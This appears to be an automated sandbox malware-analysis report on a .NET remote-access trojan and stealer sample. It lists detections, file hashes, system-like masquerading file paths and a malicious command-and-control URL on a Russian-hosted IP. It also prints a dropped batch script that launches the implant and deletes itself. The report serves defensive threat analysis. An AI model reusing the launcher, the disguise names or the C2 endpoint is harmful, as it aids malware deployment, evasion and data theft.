                          C:\Program Files (x86)\jDownloader\config\dllhost.exe | 100% | Avira | HEUR/AGEN.1323342
                          C:\Users\user\Desktop\HCaVYTBq.log | 100% | Avira | TR/AVI.Agent.updqb
                          C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe | 100% | Avira | VBS/Runner.VPG
                          C:\Users\Default\Videos\OfficeClickToRun.exe | 100% | Avira | HEUR/AGEN.1323342
                          C:\Users\user\Desktop\gNqaUEQu.log | 100% | Avira | TR/Agent.jbwuj
                          C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat | 100% | Avira | BAT/Delbat.C
                          C:\Users\user\Desktop\jpaRTMbF.log | 100% | Avira | TR/Agent.jbwuj
                          C:\Recovery\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342
                          C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe | 100% | Avira | HEUR/AGEN.1323342
                          C:\savesSession\ComponentBrokermonitor.exe | 100% | Joe Sandbox ML |
                          C:\savesSession\winlogon.exe | 100% | Joe Sandbox ML |
                          C:\Program Files (x86)\jDownloader\config\dllhost.exe | 100% | Joe Sandbox ML |
                          C:\Users\Default\Videos\OfficeClickToRun.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\Desktop\JfKMXbLC.log | 100% | Joe Sandbox ML |
                          C:\Recovery\RuntimeBroker.exe | 100% | Joe Sandbox ML |
                          C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\Desktop\yZRgoalJ.log | 100% | Joe Sandbox ML |
                          C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                          C:\Program Files (x86)\jDownloader\config\dllhost.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                          C:\Recovery\RuntimeBroker.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                          C:\Users\Default\Videos\OfficeClickToRun.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                          C:\Users\user\Desktop\ERuFRGqx.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\HCaVYTBq.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\HufwPOBJ.log | 29% | ReversingLabs |
                          C:\Users\user\Desktop\JfKMXbLC.log | 5% | ReversingLabs |
                          C:\Users\user\Desktop\MqhNXtrC.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\PYnlzHQq.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\eKDszVMz.log | 25% | ReversingLabs |
                          C:\Users\user\Desktop\gNqaUEQu.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\jpaRTMbF.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\lAIZxBgi.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\odsQwJqu.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\vomPhMaQ.log | 29% | ReversingLabs |
                          C:\Users\user\Desktop\yIzGwiSf.log | 25% | ReversingLabs |
                          C:\Users\user\Desktop\yZRgoalJ.log | 5% | ReversingLabs |
                          C:\savesSession\ComponentBrokermonitor.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                          C:\savesSession\winlogon.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label
                          http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.php | 100% | Avira URL Cloud | malware
                          http://185.239H | 0% | Avira URL Cloud | safe
                          http://185.239.51.56/ | 0% | Avira URL Cloud | safe
                          http://185.239.51.56 | 0% | Avira URL Cloud | safe

                          No contacted domains info

                          Name | Malicious | Antivirus Detection | Reputation
                          http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.php | true | Avira URL Cloud: malware | unknown
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          185.239.51.56 | unknown | Russian Federation | 202423 | MGNHOST-ASRU | true
                          Joe Sandbox version: 41.0.0 Charoite
                          Analysis ID: 1582936
                          Start date and time: 2025-01-01 02:26:05 +01:00
                          Joe Sandbox product: CloudBasic
                          Overall analysis duration: 0h 7m 19s
                          Hypervisor based Inspection enabled: false
                          Report type: full
                          Cookbook file name: default.jbs
                          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed: 15
                          Number of new started drivers analysed: 0
                          Number of existing processes analysed: 0
                          Number of existing drivers analysed: 0
                          Number of injected processes analysed: 0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode: default
                          Analysis stop reason: Timeout
                          Sample name: voed9G7p5s.exe (renamed because original name is a hash value)
                          Original Sample Name: 0e22e05075402fd6fc2f0a833d49c288.exe
                          Detection: MAL
                          Classification: mal100.troj.evad.winEXE@18/31@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information: Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 172.202.163.200, 184.28.90.27, 13.107.246.45
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              Time | Type | Description
                                                                              20:27:12 | API Interceptor | 2137525x Sleep call for process: RuntimeBroker.exe modified
                                                                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                              MGNHOST-ASRU | client.exe | malicious | AsyncRAT, DcRat | 193.233.74.21
                                                                               | file.exe | malicious | RedLine | 193.233.74.8
                                                                               | server.bin.exe | malicious | Ursnif | 5.44.43.17
                                                                               | server.exe | malicious | Ursnif | 5.44.43.17
                                                                               | server.exe | malicious | Ursnif | 5.44.43.17
                                                                               | server.exe | malicious | Ursnif | 5.44.43.17
                                                                               | marzo.txt.url | malicious | Ursnif | 5.44.43.17
                                                                               | login.dll | malicious | Ursnif | 194.116.163.130
                                                                               | login.dll | malicious | Ursnif | 194.116.163.130
                                                                               | Informazion.exe | malicious | Ursnif, zgRAT | 193.0.178.157
                                                                              Match | Associated Sample Name / URL | Detection | Threat Name
                                                                              C:\Users\user\Desktop\ERuFRGqx.log | KzLetzDiM8.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | f3I38kv.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | ZZ2sTsJFrt.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | r6cRyCpdfS.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | Z4D3XAZ2jB.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | cbCjTbodwa.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | vb8DOBZQ4X.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | 6G8OR42xrB.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                               | 9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (714), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):714
                                                                                                  Entropy (8bit):5.874966644340267
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:0sJ0EVGdvWVRVoiSy8sr9OFXQWVpW931hPz6QcFSIzUTYQEqiUZVJv9jl:98WVRq5q9FhCFSN8gZDRl
                                                                                                  MD5:AE2A74521736B100801054DDD817355F
                                                                                                  SHA1:526E908D64EA65280E04B44D19E35D175AED3582
                                                                                                  SHA-256:3977FEC931A9F311B2556B09E3FC6E1C75460CF73E4454D67CA7E362733F8F33
                                                                                                  SHA-512:4A1AD63F34040056DC67B40CC4410FB83CF3BE1007C792C10A15F244DE23210AE0F7F9FAD03EC90329D2334232FA575AA0C97DC29EB9E771E6488E6F8EFF2290
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (561), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):561
                                                                                                  Entropy (8bit):5.87120229859433
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:bb5uHmmeFEtyyayMfESzTpQWJgRHhW6fS2aARXcLj4bwaHeWwtSD:YHmmeqtbaXlzyBRH37cj4b6Ftq
                                                                                                  MD5:2B0105EBE93F09F9856B67EE55F57452
                                                                                                  SHA1:FA157202800862A4249A0D2C9FCF6C32FA03131A
                                                                                                  SHA-256:84ACDC81D859FE53D800A4E55A32459C5531FEF553E7174B1D7EB96CC4B0C2E0
                                                                                                  SHA-512:6348EF63E128AA6C0309260858C71EB751CCFF03FF7CEAEAA176E162035706805CFDFB0B07095E640E8224E6D9F8D9CE4AC491CE700A493AFC55D57999A8C8FC
                                                                                                  Malicious:false
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (388), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):388
                                                                                                  Entropy (8bit):5.83669045096348
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:NsjImP9yS1qIm7YEXpx27y3tddlRiubS0yIL/4:KsmP9y5Im7Yo8OtddlRY0nT4
                                                                                                  MD5:4D9AE7481F7955DAEB69F567C653B916
                                                                                                  SHA1:A7AC872CAED3F47E0A78AA52788B86336035085D
                                                                                                  SHA-256:ED1F7005FDDEA02D57EE8C007B7445D467F6645B9AAF162CE04525A3348FE512
                                                                                                  SHA-512:F3DD017DDDBA7F424A289BDCB90C51E293B679F1ADF55D446D56C153D1071815599202615C31724E3A6249B0E1727D52F38837B3CA89CD24EB235104F7D4AE0D
                                                                                                  Malicious:false
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Videos\OfficeClickToRun.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Videos\OfficeClickToRun.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (453), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):453
                                                                                                  Entropy (8bit):5.851088134418762
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:HosCj5YRBjTT6jFsdRL3qns9mVsxrq2YS:HosCj52eKD3qnYF
                                                                                                  MD5:026D3D8E0DDB8392FD40493EA177626C
                                                                                                  SHA1:57C2E3BC2FC427499B2279DAD15BD02C4E709FC8
                                                                                                  SHA-256:6D465284A563E410339BF55CA3ADB30F6AEB973A43D0897CF7893A22341EAE14
                                                                                                  SHA-512:08E1832E798AE4FB3D6491A09F68B51490E59B870D36D25308860D905ECEA79A223B2E3656E8859FC027A8F325BCFAEFA7B419F12864D29A1943877BE05C3C9B
                                                                                                  Malicious:false
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1382
                                                                                                  Entropy (8bit):5.365673074279152
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs1E4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIT
                                                                                                  MD5:1F5121093A9EE34BCE821E70ED53B2EF
                                                                                                  SHA1:8EBA7D53402458E9F6B238C876FFC5A0BE4C90EE
                                                                                                  SHA-256:6075C30BA70160FF8DB47E95C8569278A13795503B2309659E31DD818C2230C5
                                                                                                  SHA-512:C8DDC54E54239A82AD49F638A8A434885C1AC2EA7F000E5E1E0D2F0C7729905DCD94870F7895E3682BE3619A1A8580E5A8D21D13311F29E35C0E790054594CE8
                                                                                                  Malicious:false
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25
                                                                                                  Entropy (8bit):4.4838561897747224
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:9uVO0:8b
                                                                                                  MD5:73971421F3F87AF09D05AC95F3F55333
                                                                                                  SHA1:4889E6215DBC32E2DB8ECD02EA7FE04D38A30F55
                                                                                                  SHA-256:86B441D7EDE39FC8CF5017C6ECB52860172C8FE4477CCD3988FBD00A251836EE
                                                                                                  SHA-512:B6E3C571C826271BEEA645A847DB95C9C7D4D9715C884FA0D6AAE945CCD35171DEEBB365DFA754DFA2AF5446AC043FE12BC128CC2CD2CCFFA99BC6560E0E1D24
                                                                                                  Malicious:false
                                                                                                  Preview:mDyjWeM4TthB5bGTq8Yw6kXeQ
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):205
                                                                                                  Entropy (8bit):5.097896160799696
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:hCijTg3Nou1SV+DE7ZxvIKOZG1wkn23fCJNe:HTg9uYDE7vCfKa
                                                                                                  MD5:9F5BA9FE0276521D46D919AF31136BC0
                                                                                                  SHA1:4C1DF61B048904F9F6BCED9AD737CEDF33A254A1
                                                                                                  SHA-256:3B7F7C2403DD142AC091F3F2DB8F14F60A0B6086C752FBBA2B83185525B6FA23
                                                                                                  SHA-512:111F22D287F81D0C7A3907AF3E145B87C2541F950C1FD760C0F1954A215B5DB9F68DB071E4A8E533C50F5285600CB766A01CCC22208D204F1E844BC2D050908E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\uT6K3ltlhZ.bat"
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33792
                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: KzLetzDiM8.exe, Detection: malicious, Browse
                                                                                                  • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                  • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                                                                  • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                                                                  • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                                  • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                                                                  • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                                                                  • Filename: 6G8OR42xrB.exe, Detection: malicious, Browse
                                                                                                  • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                                  • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):69632
                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70144
                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46592
                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):69632
                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33792
                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
